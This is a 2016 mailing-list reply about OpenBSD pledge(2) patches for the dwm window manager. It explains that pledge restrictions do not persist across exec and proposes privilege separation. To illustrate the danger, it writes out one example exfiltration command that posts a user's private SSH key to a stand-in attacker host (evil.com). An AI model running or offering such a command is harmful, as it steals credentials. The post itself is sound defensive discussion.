Re: [dev] pledge(2) patches

From: Kamil Cholewiński <harry666t_AT_gmail.com>
Date: Mon, 06 Jun 2016 13:37:43 +0200

On Mon, 06 Jun 2016, Martin Kühne <mysatyre_AT_gmail.com> wrote:
> Can it somehow be made to keep its effect across the exec family of syscalls?
>
> cheers!
> mar77i

No. This is why pledging "stdio proc exec" is still quite dangerous. A
well-designed program may try separating this functionality into a
separate utility, or at least a different process.

For example, the latest version of my dwm patch uses "stdio rpath proc
exec", which means, if e.g. there was a bug in window title handling, a
potential attacker could exploit it to run sth like "curl -d
@.ssh/id_rsa http://evil.com/" or whatever else he needs to steal your
laundry.

Theoretically, such a bug could be exploited just by loading a web page
or SSHing to a remote server - even if the web browser, the terminal
emulator, the SSH client, were otherwise all secure.

But the only reason dwm needs proc and exec is so that it can spawn st,
dmenu, etc. on a keypress. This functionality could be handled by a
separate tool or a subprocess that doesn't need to process window
titles. In such a case, the main dwm process could pledge to only use
"stdio rpath".

Hope this clarifies everything!

<3,K.
Received on Mon Jun 06 2016 - 13:37:43 CEST

This archive was generated by hypermail 2.3.0 : Mon Jun 06 2016 - 13:48:18 CEST